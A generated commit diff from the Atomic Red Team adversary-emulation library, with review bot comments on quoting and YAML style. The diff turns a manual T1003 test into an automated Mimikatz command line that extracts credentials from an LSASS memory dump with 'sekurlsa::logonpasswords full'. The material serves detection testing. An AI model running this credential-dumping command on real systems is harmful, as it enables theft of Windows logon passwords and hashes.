Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2019-12-30 15:19:21 +00:00
parent fc060f9e92
commit eac69aa2d9
2 changed files with 17 additions and 23 deletions
+6 -12
@@ -315,19 +315,13 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
| mimikatz_binary_path | Path of the Mimikatz binary | string | $PathToAtomicsFolder\T1003\bin\mimikatz.exe|
| input_file | Path of the Lsass dump | Path | C:\Windows\Temp\lsass_dump.dmp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
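Review bot: In the new command line, `#{mimikatz_binary_path}` is substituted unquoted, so a path that resolves to a directory containing spaces will split into several tokens at the command prompt; wrap the binary path in double quotes. The same concern applies to `#{input_file}` inside the `sekurlsa::minidump` argument when a caller overrides it with a path containing spaces. The inputs table also no longer says where the dump comes from: the `input_file` description changed from an output location to an existing file, so this section should state that an LSASS dump must already be present at that path, and that the Mimikatz binary must exist at `mimikatz_binary_path`, before the test runs. Since this document is generated, both fixes belong in the YAML source.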
+11 -11
@@ -19532,21 +19532,21 @@ credential-access:
supported_platforms:
- windows
input_arguments:
mimikatz_binary_path:
description: Path of the Mimikatz binary
type: string
default: "$PathToAtomicsFolder\\T1003\\bin\\mimikatz.exe"
input_file:
description: Path where resulting dump should be placed
description: Path of the Lsass dump
type: Path
default: lsass_dump.dmp
default: C:\Windows\Temp\lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
name: command_prompt
elevation_required: true
command: '#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
'
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
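Review bot: The `command:` value is a single-quoted scalar that wraps between `sekurlsa::logonpasswords` and `full" exit`, so the string that gets executed depends on YAML line folding turning that break into a single space. A literal block scalar (`command: |`) with the whole command on one line would make the exact string obvious and remove the dangling closing quote. In `input_arguments`, the two path arguments are declared inconsistently: `mimikatz_binary_path` is `type: string` with a double-quoted, backslash-escaped default, while `input_file` is `type: Path` with an unquoted default. Pick one type and one quoting style for both.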